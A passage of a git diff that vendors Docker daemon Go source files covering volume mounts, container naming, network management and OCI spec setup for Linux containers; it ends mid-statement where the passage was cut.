+ if err := daemon.containerd.Create((container.ID + "_servicing"), "", "", *spec, container.InitializeStdio, newOpts...); err != nil { + container.SetExitCode(-1) + return fmt.Errorf("Post-run update servicing failed: %s", err) + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/mounts.go b/vendor/github.com/docker/docker/daemon/mounts.go new file mode 100644 index 0000000000..1c11f86a80 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/mounts.go @@ -0,0 +1,48 @@ +package daemon + +import ( + "fmt" + "strings" + + "github.com/docker/docker/container" + volumestore "github.com/docker/docker/volume/store" +) + +func (daemon *Daemon) prepareMountPoints(container *container.Container) error { + for _, config := range container.MountPoints { + if err := daemon.lazyInitializeVolume(container.ID, config); err != nil { + return err + } + } + return nil +} + +func (daemon *Daemon) removeMountPoints(container *container.Container, rm bool) error { + var rmErrors []string + for _, m := range container.MountPoints { + if m.Volume == nil { + continue + } + daemon.volumes.Dereference(m.Volume, container.ID) + if rm { + // Do not remove named mountpoints + // these are mountpoints specified like `docker run -v :/foo` + if m.Spec.Source != "" { + continue + } + err := daemon.volumes.Remove(m.Volume) + // Ignore volume in use errors because having this + // volume being referenced by other container is + // not an error, but an implementation detail. + // This prevents docker from logging "ERROR: Volume in use" + // where there is another container using the volume. 
+ if err != nil && !volumestore.IsInUse(err) { + rmErrors = append(rmErrors, err.Error()) + } + } + } + if len(rmErrors) > 0 { + return fmt.Errorf("Error removing volumes:\n%v", strings.Join(rmErrors, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/names.go b/vendor/github.com/docker/docker/daemon/names.go new file mode 100644 index 0000000000..273d551513 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/names.go @@ -0,0 +1,116 @@ +package daemon + +import ( + "fmt" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/namesgenerator" + "github.com/docker/docker/pkg/registrar" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/utils" +) + +var ( + validContainerNameChars = utils.RestrictedNameChars + validContainerNamePattern = utils.RestrictedNamePattern +) + +func (daemon *Daemon) registerName(container *container.Container) error { + if daemon.Exists(container.ID) { + return fmt.Errorf("Container is already loaded") + } + if err := validateID(container.ID); err != nil { + return err + } + if container.Name == "" { + name, err := daemon.generateNewName(container.ID) + if err != nil { + return err + } + container.Name = name + + if err := container.ToDiskLocking(); err != nil { + logrus.Errorf("Error saving container name to disk: %v", err) + } + } + return daemon.nameIndex.Reserve(container.Name, container.ID) +} + +func (daemon *Daemon) generateIDAndName(name string) (string, string, error) { + var ( + err error + id = stringid.GenerateNonCryptoID() + ) + + if name == "" { + if name, err = daemon.generateNewName(id); err != nil { + return "", "", err + } + return id, name, nil + } + + if name, err = daemon.reserveName(id, name); err != nil { + return "", "", err + } + + return id, name, nil +} + +func (daemon *Daemon) reserveName(id, name string) (string, error) { + if !validContainerNamePattern.MatchString(strings.TrimPrefix(name, "/")) { + 
return "", fmt.Errorf("Invalid container name (%s), only %s are allowed", name, validContainerNameChars) + } + if name[0] != '/' { + name = "/" + name + } + + if err := daemon.nameIndex.Reserve(name, id); err != nil { + if err == registrar.ErrNameReserved { + id, err := daemon.nameIndex.Get(name) + if err != nil { + logrus.Errorf("got unexpected error while looking up reserved name: %v", err) + return "", err + } + return "", fmt.Errorf("Conflict. The container name %q is already in use by container %s. You have to remove (or rename) that container to be able to reuse that name.", name, id) + } + return "", fmt.Errorf("error reserving name: %s, error: %v", name, err) + } + return name, nil +} + +func (daemon *Daemon) releaseName(name string) { + daemon.nameIndex.Release(name) +} + +func (daemon *Daemon) generateNewName(id string) (string, error) { + var name string + for i := 0; i < 6; i++ { + name = namesgenerator.GetRandomName(i) + if name[0] != '/' { + name = "/" + name + } + + if err := daemon.nameIndex.Reserve(name, id); err != nil { + if err == registrar.ErrNameReserved { + continue + } + return "", err + } + return name, nil + } + + name = "/" + stringid.TruncateID(id) + if err := daemon.nameIndex.Reserve(name, id); err != nil { + return "", err + } + return name, nil +} + +func validateID(id string) error { + if id == "" { + return fmt.Errorf("Invalid empty id") + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/network.go b/vendor/github.com/docker/docker/daemon/network.go new file mode 100644 index 0000000000..ab8fd88da8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/network.go @@ -0,0 +1,498 @@ +package daemon + +import ( + "fmt" + "net" + "runtime" + "sort" + "strings" + + "github.com/Sirupsen/logrus" + apierrors "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + clustertypes "github.com/docker/docker/daemon/cluster/provider" + 
"github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/runconfig" + "github.com/docker/libnetwork" + "github.com/docker/libnetwork/driverapi" + "github.com/docker/libnetwork/ipamapi" + networktypes "github.com/docker/libnetwork/types" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +// NetworkControllerEnabled checks if the networking stack is enabled. +// This feature depends on OS primitives and it's disabled in systems like Windows. +func (daemon *Daemon) NetworkControllerEnabled() bool { + return daemon.netController != nil +} + +// FindNetwork function finds a network for a given string that can represent network name or id +func (daemon *Daemon) FindNetwork(idName string) (libnetwork.Network, error) { + // Find by Name + n, err := daemon.GetNetworkByName(idName) + if err != nil && !isNoSuchNetworkError(err) { + return nil, err + } + + if n != nil { + return n, nil + } + + // Find by id + return daemon.GetNetworkByID(idName) +} + +func isNoSuchNetworkError(err error) bool { + _, ok := err.(libnetwork.ErrNoSuchNetwork) + return ok +} + +// GetNetworkByID function returns a network whose ID begins with the given prefix. +// It fails with an error if no matching, or more than one matching, networks are found. +func (daemon *Daemon) GetNetworkByID(partialID string) (libnetwork.Network, error) { + list := daemon.GetNetworksByID(partialID) + + if len(list) == 0 { + return nil, libnetwork.ErrNoSuchNetwork(partialID) + } + if len(list) > 1 { + return nil, libnetwork.ErrInvalidID(partialID) + } + return list[0], nil +} + +// GetNetworkByName function returns a network for a given network name. +// If no network name is given, the default network is returned. 
+func (daemon *Daemon) GetNetworkByName(name string) (libnetwork.Network, error) { + c := daemon.netController + if c == nil { + return nil, libnetwork.ErrNoSuchNetwork(name) + } + if name == "" { + name = c.Config().Daemon.DefaultNetwork + } + return c.NetworkByName(name) +} + +// GetNetworksByID returns a list of networks whose ID partially matches zero or more networks +func (daemon *Daemon) GetNetworksByID(partialID string) []libnetwork.Network { + c := daemon.netController + if c == nil { + return nil + } + list := []libnetwork.Network{} + l := func(nw libnetwork.Network) bool { + if strings.HasPrefix(nw.ID(), partialID) { + list = append(list, nw) + } + return false + } + c.WalkNetworks(l) + + return list +} + +// getAllNetworks returns a list containing all networks +func (daemon *Daemon) getAllNetworks() []libnetwork.Network { + c := daemon.netController + list := []libnetwork.Network{} + l := func(nw libnetwork.Network) bool { + list = append(list, nw) + return false + } + c.WalkNetworks(l) + + return list +} + +func isIngressNetwork(name string) bool { + return name == "ingress" +} + +var ingressChan = make(chan struct{}, 1) + +func ingressWait() func() { + ingressChan <- struct{}{} + return func() { <-ingressChan } +} + +// SetupIngress setups ingress networking. 
+func (daemon *Daemon) SetupIngress(create clustertypes.NetworkCreateRequest, nodeIP string) error { + ip, _, err := net.ParseCIDR(nodeIP) + if err != nil { + return err + } + + go func() { + controller := daemon.netController + controller.AgentInitWait() + + if n, err := daemon.GetNetworkByName(create.Name); err == nil && n != nil && n.ID() != create.ID { + if err := controller.SandboxDestroy("ingress-sbox"); err != nil { + logrus.Errorf("Failed to delete stale ingress sandbox: %v", err) + return + } + + // Cleanup any stale endpoints that might be left over during previous iterations + epList := n.Endpoints() + for _, ep := range epList { + if err := ep.Delete(true); err != nil { + logrus.Errorf("Failed to delete endpoint %s (%s): %v", ep.Name(), ep.ID(), err) + } + } + + if err := n.Delete(); err != nil { + logrus.Errorf("Failed to delete stale ingress network %s: %v", n.ID(), err) + return + } + } + + if _, err := daemon.createNetwork(create.NetworkCreateRequest, create.ID, true); err != nil { + // If it is any other error other than already + // exists error log error and return. + if _, ok := err.(libnetwork.NetworkNameError); !ok { + logrus.Errorf("Failed creating ingress network: %v", err) + return + } + + // Otherwise continue down the call to create or recreate sandbox. 
+ } + + n, err := daemon.GetNetworkByID(create.ID) + if err != nil { + logrus.Errorf("Failed getting ingress network by id after creating: %v", err) + return + } + + sb, err := controller.NewSandbox("ingress-sbox", libnetwork.OptionIngress()) + if err != nil { + if _, ok := err.(networktypes.ForbiddenError); !ok { + logrus.Errorf("Failed creating ingress sandbox: %v", err) + } + return + } + + ep, err := n.CreateEndpoint("ingress-endpoint", libnetwork.CreateOptionIpam(ip, nil, nil, nil)) + if err != nil { + logrus.Errorf("Failed creating ingress endpoint: %v", err) + return + } + + if err := ep.Join(sb, nil); err != nil { + logrus.Errorf("Failed joining ingress sandbox to ingress endpoint: %v", err) + } + + if err := sb.EnableService(); err != nil { + logrus.WithError(err).Error("Failed enabling service for ingress sandbox") + } + }() + + return nil +} + +// SetNetworkBootstrapKeys sets the bootstrap keys. +func (daemon *Daemon) SetNetworkBootstrapKeys(keys []*networktypes.EncryptionKey) error { + return daemon.netController.SetKeys(keys) +} + +// UpdateAttachment notifies the attacher about the attachment config. +func (daemon *Daemon) UpdateAttachment(networkName, networkID, containerID string, config *network.NetworkingConfig) error { + if daemon.clusterProvider == nil { + return fmt.Errorf("cluster provider is not initialized") + } + + if err := daemon.clusterProvider.UpdateAttachment(networkName, containerID, config); err != nil { + return daemon.clusterProvider.UpdateAttachment(networkID, containerID, config) + } + + return nil +} + +// WaitForDetachment makes the cluster manager wait for detachment of +// the container from the network. 
+func (daemon *Daemon) WaitForDetachment(ctx context.Context, networkName, networkID, taskID, containerID string) error { + if daemon.clusterProvider == nil { + return fmt.Errorf("cluster provider is not initialized") + } + + return daemon.clusterProvider.WaitForDetachment(ctx, networkName, networkID, taskID, containerID) +} + +// CreateManagedNetwork creates an agent network. +func (daemon *Daemon) CreateManagedNetwork(create clustertypes.NetworkCreateRequest) error { + _, err := daemon.createNetwork(create.NetworkCreateRequest, create.ID, true) + return err +} + +// CreateNetwork creates a network with the given name, driver and other optional parameters +func (daemon *Daemon) CreateNetwork(create types.NetworkCreateRequest) (*types.NetworkCreateResponse, error) { + resp, err := daemon.createNetwork(create, "", false) + if err != nil { + return nil, err + } + return resp, err +} + +func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string, agent bool) (*types.NetworkCreateResponse, error) { + // If there is a pending ingress network creation wait here + // since ingress network creation can happen via node download + // from manager or task download. 
+ if isIngressNetwork(create.Name) { + defer ingressWait()() + } + + if runconfig.IsPreDefinedNetwork(create.Name) && !agent { + err := fmt.Errorf("%s is a pre-defined network and cannot be created", create.Name) + return nil, apierrors.NewRequestForbiddenError(err) + } + + var warning string + nw, err := daemon.GetNetworkByName(create.Name) + if err != nil { + if _, ok := err.(libnetwork.ErrNoSuchNetwork); !ok { + return nil, err + } + } + if nw != nil { + if create.CheckDuplicate { + return nil, libnetwork.NetworkNameError(create.Name) + } + warning = fmt.Sprintf("Network with name %s (id : %s) already exists", nw.Name(), nw.ID()) + } + + c := daemon.netController + driver := create.Driver + if driver == "" { + driver = c.Config().Daemon.DefaultDriver + } + + nwOptions := []libnetwork.NetworkOption{ + libnetwork.NetworkOptionEnableIPv6(create.EnableIPv6), + libnetwork.NetworkOptionDriverOpts(create.Options), + libnetwork.NetworkOptionLabels(create.Labels), + libnetwork.NetworkOptionAttachable(create.Attachable), + } + + if create.IPAM != nil { + ipam := create.IPAM + v4Conf, v6Conf, err := getIpamConfig(ipam.Config) + if err != nil { + return nil, err + } + nwOptions = append(nwOptions, libnetwork.NetworkOptionIpam(ipam.Driver, "", v4Conf, v6Conf, ipam.Options)) + } + + if create.Internal { + nwOptions = append(nwOptions, libnetwork.NetworkOptionInternalNetwork()) + } + if agent { + nwOptions = append(nwOptions, libnetwork.NetworkOptionDynamic()) + nwOptions = append(nwOptions, libnetwork.NetworkOptionPersist(false)) + } + + if isIngressNetwork(create.Name) { + nwOptions = append(nwOptions, libnetwork.NetworkOptionIngress()) + } + + n, err := c.NewNetwork(driver, create.Name, id, nwOptions...) 
+ if err != nil { + return nil, err + } + + daemon.pluginRefCount(driver, driverapi.NetworkPluginEndpointType, plugingetter.ACQUIRE) + if create.IPAM != nil { + daemon.pluginRefCount(create.IPAM.Driver, ipamapi.PluginEndpointType, plugingetter.ACQUIRE) + } + daemon.LogNetworkEvent(n, "create") + + return &types.NetworkCreateResponse{ + ID: n.ID(), + Warning: warning, + }, nil +} + +func (daemon *Daemon) pluginRefCount(driver, capability string, mode int) { + var builtinDrivers []string + + if capability == driverapi.NetworkPluginEndpointType { + builtinDrivers = daemon.netController.BuiltinDrivers() + } else if capability == ipamapi.PluginEndpointType { + builtinDrivers = daemon.netController.BuiltinIPAMDrivers() + } + + for _, d := range builtinDrivers { + if d == driver { + return + } + } + + if daemon.PluginStore != nil { + _, err := daemon.PluginStore.Get(driver, capability, mode) + if err != nil { + logrus.WithError(err).WithFields(logrus.Fields{"mode": mode, "driver": driver}).Error("Error handling plugin refcount operation") + } + } +} + +func getIpamConfig(data []network.IPAMConfig) ([]*libnetwork.IpamConf, []*libnetwork.IpamConf, error) { + ipamV4Cfg := []*libnetwork.IpamConf{} + ipamV6Cfg := []*libnetwork.IpamConf{} + for _, d := range data { + iCfg := libnetwork.IpamConf{} + iCfg.PreferredPool = d.Subnet + iCfg.SubPool = d.IPRange + iCfg.Gateway = d.Gateway + iCfg.AuxAddresses = d.AuxAddress + ip, _, err := net.ParseCIDR(d.Subnet) + if err != nil { + return nil, nil, fmt.Errorf("Invalid subnet %s : %v", d.Subnet, err) + } + if ip.To4() != nil { + ipamV4Cfg = append(ipamV4Cfg, &iCfg) + } else { + ipamV6Cfg = append(ipamV6Cfg, &iCfg) + } + } + return ipamV4Cfg, ipamV6Cfg, nil +} + +// UpdateContainerServiceConfig updates a service configuration. 
+func (daemon *Daemon) UpdateContainerServiceConfig(containerName string, serviceConfig *clustertypes.ServiceConfig) error { + container, err := daemon.GetContainer(containerName) + if err != nil { + return err + } + + container.NetworkSettings.Service = serviceConfig + return nil +} + +// ConnectContainerToNetwork connects the given container to the given +// network. If either cannot be found, an err is returned. If the +// network cannot be set up, an err is returned. +func (daemon *Daemon) ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error { + if runtime.GOOS == "solaris" { + return errors.New("docker network connect is unsupported on Solaris platform") + } + container, err := daemon.GetContainer(containerName) + if err != nil { + return err + } + return daemon.ConnectToNetwork(container, networkName, endpointConfig) +} + +// DisconnectContainerFromNetwork disconnects the given container from +// the given network. If either cannot be found, an err is returned. +func (daemon *Daemon) DisconnectContainerFromNetwork(containerName string, networkName string, force bool) error { + if runtime.GOOS == "solaris" { + return errors.New("docker network disconnect is unsupported on Solaris platform") + } + container, err := daemon.GetContainer(containerName) + if err != nil { + if force { + return daemon.ForceEndpointDelete(containerName, networkName) + } + return err + } + return daemon.DisconnectFromNetwork(container, networkName, force) +} + +// GetNetworkDriverList returns the list of plugins drivers +// registered for network. 
+func (daemon *Daemon) GetNetworkDriverList() []string { + if !daemon.NetworkControllerEnabled() { + return nil + } + + pluginList := daemon.netController.BuiltinDrivers() + + managedPlugins := daemon.PluginStore.GetAllManagedPluginsByCap(driverapi.NetworkPluginEndpointType) + + for _, plugin := range managedPlugins { + pluginList = append(pluginList, plugin.Name()) + } + + pluginMap := make(map[string]bool) + for _, plugin := range pluginList { + pluginMap[plugin] = true + } + + networks := daemon.netController.Networks() + + for _, network := range networks { + if !pluginMap[network.Type()] { + pluginList = append(pluginList, network.Type()) + pluginMap[network.Type()] = true + } + } + + sort.Strings(pluginList) + + return pluginList +} + +// DeleteManagedNetwork deletes an agent network. +func (daemon *Daemon) DeleteManagedNetwork(networkID string) error { + return daemon.deleteNetwork(networkID, true) +} + +// DeleteNetwork destroys a network unless it's one of docker's predefined networks. 
+func (daemon *Daemon) DeleteNetwork(networkID string) error { + return daemon.deleteNetwork(networkID, false) +} + +func (daemon *Daemon) deleteNetwork(networkID string, dynamic bool) error { + nw, err := daemon.FindNetwork(networkID) + if err != nil { + return err + } + + if runconfig.IsPreDefinedNetwork(nw.Name()) && !dynamic { + err := fmt.Errorf("%s is a pre-defined network and cannot be removed", nw.Name()) + return apierrors.NewRequestForbiddenError(err) + } + + if err := nw.Delete(); err != nil { + return err + } + daemon.pluginRefCount(nw.Type(), driverapi.NetworkPluginEndpointType, plugingetter.RELEASE) + ipamType, _, _, _ := nw.Info().IpamConfig() + daemon.pluginRefCount(ipamType, ipamapi.PluginEndpointType, plugingetter.RELEASE) + daemon.LogNetworkEvent(nw, "destroy") + return nil +} + +// GetNetworks returns a list of all networks +func (daemon *Daemon) GetNetworks() []libnetwork.Network { + return daemon.getAllNetworks() +} + +// clearAttachableNetworks removes the attachable networks +// after disconnecting any connected container +func (daemon *Daemon) clearAttachableNetworks() { + for _, n := range daemon.GetNetworks() { + if !n.Info().Attachable() { + continue + } + for _, ep := range n.Endpoints() { + epInfo := ep.Info() + if epInfo == nil { + continue + } + sb := epInfo.Sandbox() + if sb == nil { + continue + } + containerID := sb.ContainerID() + if err := daemon.DisconnectContainerFromNetwork(containerID, n.ID(), true); err != nil { + logrus.Warnf("Failed to disconnect container %s from swarm network %s on cluster leave: %v", + containerID, n.Name(), err) + } + } + if err := daemon.DeleteManagedNetwork(n.ID()); err != nil { + logrus.Warnf("Failed to remove swarm network %s on cluster leave: %v", n.Name(), err) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/network/settings.go b/vendor/github.com/docker/docker/daemon/network/settings.go new file mode 100644 index 0000000000..8f6b7dd59e --- /dev/null +++ 
b/vendor/github.com/docker/docker/daemon/network/settings.go @@ -0,0 +1,33 @@ +package network + +import ( + networktypes "github.com/docker/docker/api/types/network" + clustertypes "github.com/docker/docker/daemon/cluster/provider" + "github.com/docker/go-connections/nat" +) + +// Settings stores configuration details about the daemon network config +// TODO Windows. Many of these fields can be factored out., +type Settings struct { + Bridge string + SandboxID string + HairpinMode bool + LinkLocalIPv6Address string + LinkLocalIPv6PrefixLen int + Networks map[string]*EndpointSettings + Service *clustertypes.ServiceConfig + Ports nat.PortMap + SandboxKey string + SecondaryIPAddresses []networktypes.Address + SecondaryIPv6Addresses []networktypes.Address + IsAnonymousEndpoint bool + HasSwarmEndpoint bool +} + +// EndpointSettings is a package local wrapper for +// networktypes.EndpointSettings which stores Endpoint state that +// needs to be persisted to disk but not exposed in the api. +type EndpointSettings struct { + *networktypes.EndpointSettings + IPAMOperational bool +} diff --git a/vendor/github.com/docker/docker/daemon/oci_linux.go b/vendor/github.com/docker/docker/daemon/oci_linux.go new file mode 100644 index 0000000000..a72b0b873d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/oci_linux.go @@ -0,0 +1,790 @@ +package daemon + +import ( + "fmt" + "io" + "os" + "os/exec" + "path/filepath" + "sort" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/caps" + "github.com/docker/docker/oci" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/stringutils" + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/volume" + "github.com/opencontainers/runc/libcontainer/apparmor" + "github.com/opencontainers/runc/libcontainer/cgroups" + 
"github.com/opencontainers/runc/libcontainer/devices" + "github.com/opencontainers/runc/libcontainer/user" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +func setResources(s *specs.Spec, r containertypes.Resources) error { + weightDevices, err := getBlkioWeightDevices(r) + if err != nil { + return err + } + readBpsDevice, err := getBlkioThrottleDevices(r.BlkioDeviceReadBps) + if err != nil { + return err + } + writeBpsDevice, err := getBlkioThrottleDevices(r.BlkioDeviceWriteBps) + if err != nil { + return err + } + readIOpsDevice, err := getBlkioThrottleDevices(r.BlkioDeviceReadIOps) + if err != nil { + return err + } + writeIOpsDevice, err := getBlkioThrottleDevices(r.BlkioDeviceWriteIOps) + if err != nil { + return err + } + + memoryRes := getMemoryResources(r) + cpuRes := getCPUResources(r) + blkioWeight := r.BlkioWeight + + specResources := &specs.Resources{ + Memory: memoryRes, + CPU: cpuRes, + BlockIO: &specs.BlockIO{ + Weight: &blkioWeight, + WeightDevice: weightDevices, + ThrottleReadBpsDevice: readBpsDevice, + ThrottleWriteBpsDevice: writeBpsDevice, + ThrottleReadIOPSDevice: readIOpsDevice, + ThrottleWriteIOPSDevice: writeIOpsDevice, + }, + DisableOOMKiller: r.OomKillDisable, + Pids: &specs.Pids{ + Limit: &r.PidsLimit, + }, + } + + if s.Linux.Resources != nil && len(s.Linux.Resources.Devices) > 0 { + specResources.Devices = s.Linux.Resources.Devices + } + + s.Linux.Resources = specResources + return nil +} + +func setDevices(s *specs.Spec, c *container.Container) error { + // Build lists of devices allowed and created within the container. 
+ var devs []specs.Device + devPermissions := s.Linux.Resources.Devices + if c.HostConfig.Privileged { + hostDevices, err := devices.HostDevices() + if err != nil { + return err + } + for _, d := range hostDevices { + devs = append(devs, oci.Device(d)) + } + rwm := "rwm" + devPermissions = []specs.DeviceCgroup{ + { + Allow: true, + Access: &rwm, + }, + } + } else { + for _, deviceMapping := range c.HostConfig.Devices { + d, dPermissions, err := oci.DevicesFromPath(deviceMapping.PathOnHost, deviceMapping.PathInContainer, deviceMapping.CgroupPermissions) + if err != nil { + return err + } + devs = append(devs, d...) + devPermissions = append(devPermissions, dPermissions...) + } + } + + s.Linux.Devices = append(s.Linux.Devices, devs...) + s.Linux.Resources.Devices = devPermissions + return nil +} + +func setRlimits(daemon *Daemon, s *specs.Spec, c *container.Container) error { + var rlimits []specs.Rlimit + + // We want to leave the original HostConfig alone so make a copy here + hostConfig := *c.HostConfig + // Merge with the daemon defaults + daemon.mergeUlimits(&hostConfig) + for _, ul := range hostConfig.Ulimits { + rlimits = append(rlimits, specs.Rlimit{ + Type: "RLIMIT_" + strings.ToUpper(ul.Name), + Soft: uint64(ul.Soft), + Hard: uint64(ul.Hard), + }) + } + + s.Process.Rlimits = rlimits + return nil +} + +func setUser(s *specs.Spec, c *container.Container) error { + uid, gid, additionalGids, err := getUser(c, c.Config.User) + if err != nil { + return err + } + s.Process.User.UID = uid + s.Process.User.GID = gid + s.Process.User.AdditionalGids = additionalGids + return nil +} + +func readUserFile(c *container.Container, p string) (io.ReadCloser, error) { + fp, err := symlink.FollowSymlinkInScope(filepath.Join(c.BaseFS, p), c.BaseFS) + if err != nil { + return nil, err + } + return os.Open(fp) +} + +func getUser(c *container.Container, username string) (uint32, uint32, []uint32, error) { + passwdPath, err := user.GetPasswdPath() + if err != nil { + return 0, 0, 
nil, err + } + groupPath, err := user.GetGroupPath() + if err != nil { + return 0, 0, nil, err + } + passwdFile, err := readUserFile(c, passwdPath) + if err == nil { + defer passwdFile.Close() + } + groupFile, err := readUserFile(c, groupPath) + if err == nil { + defer groupFile.Close() + } + + execUser, err := user.GetExecUser(username, nil, passwdFile, groupFile) + if err != nil { + return 0, 0, nil, err + } + + // todo: fix this double read by a change to libcontainer/user pkg + groupFile, err = readUserFile(c, groupPath) + if err == nil { + defer groupFile.Close() + } + var addGroups []int + if len(c.HostConfig.GroupAdd) > 0 { + addGroups, err = user.GetAdditionalGroups(c.HostConfig.GroupAdd, groupFile) + if err != nil { + return 0, 0, nil, err + } + } + uid := uint32(execUser.Uid) + gid := uint32(execUser.Gid) + sgids := append(execUser.Sgids, addGroups...) + var additionalGids []uint32 + for _, g := range sgids { + additionalGids = append(additionalGids, uint32(g)) + } + return uid, gid, additionalGids, nil +} + +func setNamespace(s *specs.Spec, ns specs.Namespace) { + for i, n := range s.Linux.Namespaces { + if n.Type == ns.Type { + s.Linux.Namespaces[i] = ns + return + } + } + s.Linux.Namespaces = append(s.Linux.Namespaces, ns) +} + +func setCapabilities(s *specs.Spec, c *container.Container) error { + var caplist []string + var err error + if c.HostConfig.Privileged { + caplist = caps.GetAllCapabilities() + } else { + caplist, err = caps.TweakCapabilities(s.Process.Capabilities, c.HostConfig.CapAdd, c.HostConfig.CapDrop) + if err != nil { + return err + } + } + s.Process.Capabilities = caplist + return nil +} + +func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error { + userNS := false + // user + if c.HostConfig.UsernsMode.IsPrivate() { + uidMap, gidMap := daemon.GetUIDGIDMaps() + if uidMap != nil { + userNS = true + ns := specs.Namespace{Type: "user"} + setNamespace(s, ns) + s.Linux.UIDMappings = specMapping(uidMap) + 
s.Linux.GIDMappings = specMapping(gidMap) + } + } + // network + if !c.Config.NetworkDisabled { + ns := specs.Namespace{Type: "network"} + parts := strings.SplitN(string(c.HostConfig.NetworkMode), ":", 2) + if parts[0] == "container" { + nc, err := daemon.getNetworkedContainer(c.ID, c.HostConfig.NetworkMode.ConnectedContainer()) + if err != nil { + return err + } + ns.Path = fmt.Sprintf("/proc/%d/ns/net", nc.State.GetPID()) + if userNS { + // to share a net namespace, they must also share a user namespace + nsUser := specs.Namespace{Type: "user"} + nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", nc.State.GetPID()) + setNamespace(s, nsUser) + } + } else if c.HostConfig.NetworkMode.IsHost() { + ns.Path = c.NetworkSettings.SandboxKey + } + setNamespace(s, ns) + } + // ipc + if c.HostConfig.IpcMode.IsContainer() { + ns := specs.Namespace{Type: "ipc"} + ic, err := daemon.getIpcContainer(c) + if err != nil { + return err + } + ns.Path = fmt.Sprintf("/proc/%d/ns/ipc", ic.State.GetPID()) + setNamespace(s, ns) + if userNS { + // to share an IPC namespace, they must also share a user namespace + nsUser := specs.Namespace{Type: "user"} + nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", ic.State.GetPID()) + setNamespace(s, nsUser) + } + } else if c.HostConfig.IpcMode.IsHost() { + oci.RemoveNamespace(s, specs.NamespaceType("ipc")) + } else { + ns := specs.Namespace{Type: "ipc"} + setNamespace(s, ns) + } + // pid + if c.HostConfig.PidMode.IsContainer() { + ns := specs.Namespace{Type: "pid"} + pc, err := daemon.getPidContainer(c) + if err != nil { + return err + } + ns.Path = fmt.Sprintf("/proc/%d/ns/pid", pc.State.GetPID()) + setNamespace(s, ns) + if userNS { + // to share a PID namespace, they must also share a user namespace + nsUser := specs.Namespace{Type: "user"} + nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", pc.State.GetPID()) + setNamespace(s, nsUser) + } + } else if c.HostConfig.PidMode.IsHost() { + oci.RemoveNamespace(s, specs.NamespaceType("pid")) + } else { + ns := 
specs.Namespace{Type: "pid"} + setNamespace(s, ns) + } + // uts + if c.HostConfig.UTSMode.IsHost() { + oci.RemoveNamespace(s, specs.NamespaceType("uts")) + s.Hostname = "" + } + + return nil +} + +func specMapping(s []idtools.IDMap) []specs.IDMapping { + var ids []specs.IDMapping + for _, item := range s { + ids = append(ids, specs.IDMapping{ + HostID: uint32(item.HostID), + ContainerID: uint32(item.ContainerID), + Size: uint32(item.Size), + }) + } + return ids +} + +func getMountInfo(mountinfo []*mount.Info, dir string) *mount.Info { + for _, m := range mountinfo { + if m.Mountpoint == dir { + return m + } + } + return nil +} + +// Get the source mount point of directory passed in as argument. Also return +// optional fields. +func getSourceMount(source string) (string, string, error) { + // Ensure any symlinks are resolved. + sourcePath, err := filepath.EvalSymlinks(source) + if err != nil { + return "", "", err + } + + mountinfos, err := mount.GetMounts() + if err != nil { + return "", "", err + } + + mountinfo := getMountInfo(mountinfos, sourcePath) + if mountinfo != nil { + return sourcePath, mountinfo.Optional, nil + } + + path := sourcePath + for { + path = filepath.Dir(path) + + mountinfo = getMountInfo(mountinfos, path) + if mountinfo != nil { + return path, mountinfo.Optional, nil + } + + if path == "/" { + break + } + } + + // If we are here, we did not find parent mount. Something is wrong. + return "", "", fmt.Errorf("Could not find source mount of %s", source) +} + +// Ensure mount point on which path is mounted, is shared. +func ensureShared(path string) error { + sharedMount := false + + sourceMount, optionalOpts, err := getSourceMount(path) + if err != nil { + return err + } + // Make sure source mount point is shared. 
+ optsSplit := strings.Split(optionalOpts, " ") + for _, opt := range optsSplit { + if strings.HasPrefix(opt, "shared:") { + sharedMount = true + break + } + } + + if !sharedMount { + return fmt.Errorf("Path %s is mounted on %s but it is not a shared mount.", path, sourceMount) + } + return nil +} + +// Ensure mount point on which path is mounted, is either shared or slave. +func ensureSharedOrSlave(path string) error { + sharedMount := false + slaveMount := false + + sourceMount, optionalOpts, err := getSourceMount(path) + if err != nil { + return err + } + // Make sure source mount point is shared. + optsSplit := strings.Split(optionalOpts, " ") + for _, opt := range optsSplit { + if strings.HasPrefix(opt, "shared:") { + sharedMount = true + break + } else if strings.HasPrefix(opt, "master:") { + slaveMount = true + break + } + } + + if !sharedMount && !slaveMount { + return fmt.Errorf("Path %s is mounted on %s but it is not a shared or slave mount.", path, sourceMount) + } + return nil +} + +var ( + mountPropagationMap = map[string]int{ + "private": mount.PRIVATE, + "rprivate": mount.RPRIVATE, + "shared": mount.SHARED, + "rshared": mount.RSHARED, + "slave": mount.SLAVE, + "rslave": mount.RSLAVE, + } + + mountPropagationReverseMap = map[int]string{ + mount.PRIVATE: "private", + mount.RPRIVATE: "rprivate", + mount.SHARED: "shared", + mount.RSHARED: "rshared", + mount.SLAVE: "slave", + mount.RSLAVE: "rslave", + } +) + +func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []container.Mount) error { + userMounts := make(map[string]struct{}) + for _, m := range mounts { + userMounts[m.Destination] = struct{}{} + } + + // Filter out mounts that are overridden by user supplied mounts + var defaultMounts []specs.Mount + _, mountDev := userMounts["/dev"] + for _, m := range s.Mounts { + if _, ok := 